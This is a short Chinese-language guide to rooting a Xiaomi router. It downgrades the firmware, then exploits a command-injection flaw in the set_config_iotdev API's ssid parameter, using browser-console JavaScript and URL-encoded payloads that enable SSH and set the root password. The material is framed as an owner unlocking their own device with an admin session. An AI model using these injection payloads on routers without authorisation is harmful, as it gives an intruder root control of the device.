用旧固件降级
开启SSH
1. 方案一
浏览器控制台执行
function getSTOK() {
let match = location.href.match(/;stok=(.*?)\//);
if (!match) {
return null;
}
return match[1];
}
function execute(stok, command) {
command = encodeURIComponent(command);
let path = `/cgi-bin/luci/;stok=${stok}/api/misystem/set_config_iotdev?bssid=SteelyWing&user_id=SteelyWing&ssid=-h%0A${command}%0A`;
console.log(path);
return fetch(new Request(location.origin + path));
}
function enableSSH() {
stok = getSTOK();
if (!stok) {
console.error('stok not found in URL');
return;
}
console.log(`stok = “${stok}”`);
password = prompt('Input new SSH password');
if (!password) {
console.error('You must input password');
return;
}
execute(stok,
`
nvram set ssh_en=1
nvram commit
sed -i ‘s/channel=.*/channel=\\”debug\\”/g’ /etc/init.d/dropbear
/etc/init.d/dropbear start
`
)
.then((response) => response.text())
.then((text) => console.log(text));
console.log('New SSH password: '+password);
execute(stok, `echo -e “${password}\\n${password}” | passwd root`)
.then((response) => response.text())
.then((text) => console.log(text));
}
enableSSH();
2. 方案二
降级后不要升级,先登录网页管理界面,登录后可以在地址栏上看到
http://192.168.31.1/cgi-bin/luci/;stok=XXXXXXXXXXXXXXXXXXXXXXXXXX/web/home#router
(如果你改了路由器IP地址,可能192.168.31.1处会和我的不一样,但是此处只需要stok),这里的XXX对应你自己的stok。
将XXX后面的包括斜杠"/"在内的所有文字替换成
/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h%3B%20nvram%20set%20ssh_en%3D1%3B%20nvram%20commit%3B%20sed%20-i%20's%2Fchannel%3D.*%2Fchannel%3D%5C%22debug%5C%22%2Fg'%20%2Fetc%2Finit.d%2Fdropbear%3B%20%2Fetc%2Finit.d%2Fdropbear%20start%3B
然后回车,就会有个code:0,这个时候ssh就已经打开了,若没有,请重启路由器。
III.改密SSH
开启SSH后,可以按照步骤II中的方法,将XX后面的包括斜杠"/"在内的所有文字替换成
/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h%3B%20echo%20-e%20'admin%5Cnadmin'%20%7C%20passwd%20root%3B
其中两个admin为你需要更改的密码,两个admin均需要修改,修改完后回车即可
连接
ssh -o HostKeyAlgorithms=+ssh-rsa -o PubkeyAcceptedKeyTypes=+ssh-rsa [email protected]